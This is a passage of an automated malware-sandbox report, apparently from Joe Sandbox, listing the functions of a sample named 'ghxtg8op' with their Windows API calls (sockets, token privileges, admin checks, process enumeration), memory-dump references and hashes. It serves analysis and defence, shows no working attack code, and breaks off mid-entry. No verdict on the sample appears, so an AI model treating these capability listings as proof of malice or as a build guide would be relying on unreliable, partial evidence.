                            • Opcode ID: 3bc1538f80d3f066d1a279e855786862f4f540a4ec855c8ac4b168f8e558f9d5
                            • Instruction ID: 62d4d39fd03340031400d721daaa6c64f330c39829add836e5676806d4835bed
                            • Opcode Fuzzy Hash: 3bc1538f80d3f066d1a279e855786862f4f540a4ec855c8ac4b168f8e558f9d5
                            • Instruction Fuzzy Hash: 4EA1BC79112546BFE728AF288C4AFBF395CDF42351B1C411BF652D2182DB21CDC29AB2
                            Function 00DB6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB7DB6
                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DB679E
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB67C7
                            • bind.WSOCK32(00000000,?,00000010), ref: 00DB6800
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB680D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00DB6821
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                            • String ID:
                            • API String ID: 99427753-0
                            • Opcode ID: c4932529c92413b0e617c668557e30d8b1366c0478ce99afad541ca35d5bbb75
                            • Instruction ID: 50259c33cfec01dbf632d4ea350d6382d2af71e71784a6887b3885351e156efc
                            • Opcode Fuzzy Hash: c4932529c92413b0e617c668557e30d8b1366c0478ce99afad541ca35d5bbb75
                            • Instruction Fuzzy Hash: 5E41E475A00200AFDB10BF298C96F6EB7A8DF45754F048458F916AB3D3CA749D018BB1
                            Function 00DC5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            • Opcode ID: 1e51b0a79131f9044e64e549a2a72bbc1c231b87087561b885f96fdc243d25a2
                            • Instruction ID: 600e34d34c2bbabe0ceec15e193c369363622cc4cf506edac989d94cf751d298
                            • Opcode Fuzzy Hash: 1e51b0a79131f9044e64e549a2a72bbc1c231b87087561b885f96fdc243d25a2
                            • Instruction Fuzzy Hash: CD11B231300A536BDB216F26EC44F6FBB99EF847A1B54402DF846D3241CBB0EC418AB4
                            Function 00D980A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D980C0
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D980CA
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D980D9
                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D980E0
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D980F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: b315fc41ca3dd1ecec44224b139e02438391a47a146edbb84ef82385ba817f1b
                            • Instruction ID: 6f3fc4ebbd37b4647d5c2050f905ebf6ba78b3191ba0486588ab5df38068de33
                            • Opcode Fuzzy Hash: b315fc41ca3dd1ecec44224b139e02438391a47a146edbb84ef82385ba817f1b
                            • Instruction Fuzzy Hash: 5EF06231240346BFEB100FA5EC8DEA73FADFF4AB55B040029F945E6250CB619C41EA70
                            Function 00DAC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00DAC432
                            • CoCreateInstance.OLE32(00DD2D6C,00000000,00000001,00DD2BDC,?), ref: 00DAC44A
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • CoUninitialize.OLE32 ref: 00DAC6B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_memmove
                            • String ID: .lnk
                            • API String ID: 2683427295-24824748
                            • Opcode ID: 5f5d72efa7c9ff696b168f5a4f5719767af158b822fe0e62730547f48102be8f
                            • Instruction ID: 1e255faa84f042e088156d776847471f510bc38b362d807e93bc724c57ad1465
                            • Opcode Fuzzy Hash: 5f5d72efa7c9ff696b168f5a4f5719767af158b822fe0e62730547f48102be8f
                            • Instruction Fuzzy Hash: B8A12B71104205AFD700EF54C891EAFB7E8EF99354F00492DF5959B2A2DB71EA09CB72
                            Function 00D44B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D44B45
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00D44AD0), ref: 00D44B57
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: 2b6d7fc9185e5f0910e94ec9cc9271c67aaa4d87a3663dd50c58de7522f47556
                            • Instruction ID: 73200ef523368963be24e2508ab5ae5fc01dbc91edf88d872d306887d83c06f1
                            • Opcode Fuzzy Hash: 2b6d7fc9185e5f0910e94ec9cc9271c67aaa4d87a3663dd50c58de7522f47556
                            • Instruction Fuzzy Hash: 8AD01275A10713CFD7209F31D818F8676D6EF05351B19C83D9486D6250D770D8C0C675
                            Function 00D53030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __itow__swprintf
                            • String ID:
                            • API String ID: 674341424-0
                            • Opcode ID: be8d0f24ae37835796ff8f5f309e2061c5bed6a6ca298ecc2f14e3bdefd93fc5
                            • Instruction ID: 6221e11af551ac1f36ec27e66ced136afc7216c6e517daa349b2362636e1a5fa
                            • Opcode Fuzzy Hash: be8d0f24ae37835796ff8f5f309e2061c5bed6a6ca298ecc2f14e3bdefd93fc5
                            • Instruction Fuzzy Hash: 5C2267716083009FCB25EF24C891B6EB7E5EF84750F14492DF99A97291DB71E908CBB2
                            Function 00DBEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00DBEE3D
                            • Process32FirstW.KERNEL32(00000000,?), ref: 00DBEE4B
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • Process32NextW.KERNEL32(00000000,?), ref: 00DBEF0B
                            • CloseHandle.KERNEL32(00000000), ref: 00DBEF1A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                            • String ID:
                            • API String ID: 2576544623-0
                            • Opcode ID: a6c39a94cb14ca6e982604059efd604940118696cff0b48f3641a99e26421e39
                            • Instruction ID: 80dc4599d712d35471d56b8fa1e930af7bfa897355f6beab39f7cbbd8bce0478
                            • Opcode Fuzzy Hash: a6c39a94cb14ca6e982604059efd604940118696cff0b48f3641a99e26421e39
                            • Instruction Fuzzy Hash: 9B517C71504301AFD310EF24D885EABB7E8EF98750F50492DF596972A2EB70E904CBB2
                            Function 00D9E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D9E628
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($|
                            • API String ID: 1659193697-1631851259
                            • Opcode ID: 59a6c146869dab5730bb6bc311726c87bf23a493508514aa3f3c99e1027cdb44
                            • Instruction ID: 8d6e1b20d2e971767eefb617e7cee62524d06aeb20498526237a161d9ae36b9a
                            • Opcode Fuzzy Hash: 59a6c146869dab5730bb6bc311726c87bf23a493508514aa3f3c99e1027cdb44
                            • Instruction Fuzzy Hash: 95322575A007059FDB28CF59C481A6AB7F1FF48320B15C56EE89ADB3A1EB70E941CB50
                            Function 00DAB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAB40B
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DAB465
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DAB4B2
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            • API String ID: 1682464887-0
                            • Opcode ID: 3e7525298dfd38285cc62bbd7221facf61c1498c667061858ffe37dcd7fe954b
                            • Instruction ID: 192cfe053be84bbb7e119b592f12cb6ed5fa1dc9bfb76c2cc2a8696cb89ad706
                            • Opcode Fuzzy Hash: 3e7525298dfd38285cc62bbd7221facf61c1498c667061858ffe37dcd7fe954b
                            • Instruction Fuzzy Hash: 52212F35A00209DFCB00DF95D894AEEFBB9FF49314F1480AAE905EB352DB319955CB61
                            Function 00D987E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9882B
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98858
                            • GetLastError.KERNEL32 ref: 00D98865
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                            • String ID:
                            • API String ID: 1922334811-0
                            • Opcode ID: a60f1e09a2c44f3164215fedc1cd5bd87453664d99fea228052a50a9ae10e97a
                            • Instruction ID: 321579c25f5af8cdb6a1ed90de470281cf02b57ed5520550b1719a0f44f9cf3c
                            • Opcode Fuzzy Hash: a60f1e09a2c44f3164215fedc1cd5bd87453664d99fea228052a50a9ae10e97a
                            • Instruction Fuzzy Hash: F9118FB2514305AFEB28DFA4EC85D6BBBF9EB45710B20852EF45597641EB30BC408B70
                            Function 00D9874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D98774
                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D9878B
                            • FreeSid.ADVAPI32(?), ref: 00D9879B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            • API String ID: 3429775523-0
                            • Opcode ID: 8178b7f5ace054156bbfa0e2dabdaa7c4b45e1859c765b93aaa0c8b684542856
                            • Instruction ID: 55c591eaa69b7e89489d77126840d92352a05863ed4d99ab9db612068edc3c4d
                            • Opcode Fuzzy Hash: 8178b7f5ace054156bbfa0e2dabdaa7c4b45e1859c765b93aaa0c8b684542856
                            • Instruction Fuzzy Hash: 73F04F7591130EBFDF00DFF4DC89EEDB7BDEF08601F104469A901E2281D6715A049B60
                            Function 00DA8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • __time64.LIBCMT ref: 00DA889B
                              • Part of subcall function 00D6520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DA8F6E,00000000,?,?,?,?,00DA911F,00000000,?), ref: 00D65213
                              • Part of subcall function 00D6520A: __aulldiv.LIBCMT ref: 00D65233
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Time$FileSystem__aulldiv__time64
                            • String ID: 0e
                            • API String ID: 2893107130-533242481
                            • Opcode ID: 0f664c758f6f19426b019daa732781f5810cf5f94cfd338efa1e9c176db2d3bb
                            • Instruction ID: a761a63e8d3205a4da022af946d801a6ce41bf7cc09ffaf3efffd41a533727ae
                            • Opcode Fuzzy Hash: 0f664c758f6f19426b019daa732781f5810cf5f94cfd338efa1e9c176db2d3bb
                            • Instruction Fuzzy Hash: A521A2326356108FC729CF35D841B52B3E1EBA9311B688E6CD4F5CB2D0CE35A945DB64
                            Function 00DAC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DAC6FB
                            • FindClose.KERNEL32(00000000), ref: 00DAC72B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: fb7437d492c9ff3afe09824e54cb93a34a52bba1dba91fca8a397d4a8d4875e4
                            • Instruction ID: ce725573e416f86b8c7ad33ba273000a9cf1788393d08870c88644b116ea335e
                            • Opcode Fuzzy Hash: fb7437d492c9ff3afe09824e54cb93a34a52bba1dba91fca8a397d4a8d4875e4
                            • Instruction Fuzzy Hash: 58118E726002059FDB10DF29C855A6AF7E9EF85320F00851EF8A9D7390DB30E801CFA1
                            Function 00DAA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DB9468,?,00DCFB84,?), ref: 00DAA097
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DB9468,?,00DCFB84,?), ref: 00DAA0A9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: f8fcc1bc8ec2239d6b37d23b4e0d08ccd27a2de527fb30e6e65147cd299d1676
                            • Instruction ID: 3526aa566865231aff0e559bd31cb87ad349ed95fe0bc943926195069a809e30
                            • Opcode Fuzzy Hash: f8fcc1bc8ec2239d6b37d23b4e0d08ccd27a2de527fb30e6e65147cd299d1676
                            • Instruction Fuzzy Hash: 6CF0823550522EBBDB619FA8CC48FEA776DFF09361F008665F919D6281D7309940CBB1
                            Function 00D981CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98309), ref: 00D981E0
                            • CloseHandle.KERNEL32(?), ref: 00D981F2
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            • API String ID: 81990902-0
                            • Opcode ID: b3197a10bc569d80fe08753f1405a4302b5ed7f735ae42e7d1e71404dc704011
                            • Instruction ID: cca949b53e8f7426ad3214c12bf3217376c63c01e1335753772bb4a4bbb6762b
                            • Opcode Fuzzy Hash: b3197a10bc569d80fe08753f1405a4302b5ed7f735ae42e7d1e71404dc704011
                            • Instruction Fuzzy Hash: 69E0E672010711AFE7256B60EC05D777BEAEF043107148C2DF455C4471DB62AC91DB30
                            Function 00D6A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00D6A15A
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6A163
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 4bb422965853acae258acf8d19e21d7b4d648b9758e96b57a85b76e15d88fb47
                            • Instruction ID: 6bd045144d36314646c62453ce30d13cefd4f6d721ccb4f4a9f49b231469b4f3
                            • Opcode Fuzzy Hash: 4bb422965853acae258acf8d19e21d7b4d648b9758e96b57a85b76e15d88fb47
                            • Instruction Fuzzy Hash: C6B0923105434BBBCA002B91EC09FC83F6AEB84AA2F404020FA0DC4260CB6256528AA1
                            Function 00D6F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3dac0c0d4b03b25160ccdf2a07c6b3ae46bc27b9a316d2e10892a40dfc48904
                            • Instruction ID: bc6cb260328b5c487220f322cf73bd83a305dc281bea8e877bfc00eb13352224
                            • Opcode Fuzzy Hash: f3dac0c0d4b03b25160ccdf2a07c6b3ae46bc27b9a316d2e10892a40dfc48904
                            • Instruction Fuzzy Hash: A0320622D6AF414ED7239638D872339A389AFB73C4F55D737F819B5AA5EB28C4834110
                            Function 00D7242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                            Download Yara Rule
                            Memory Dump Source
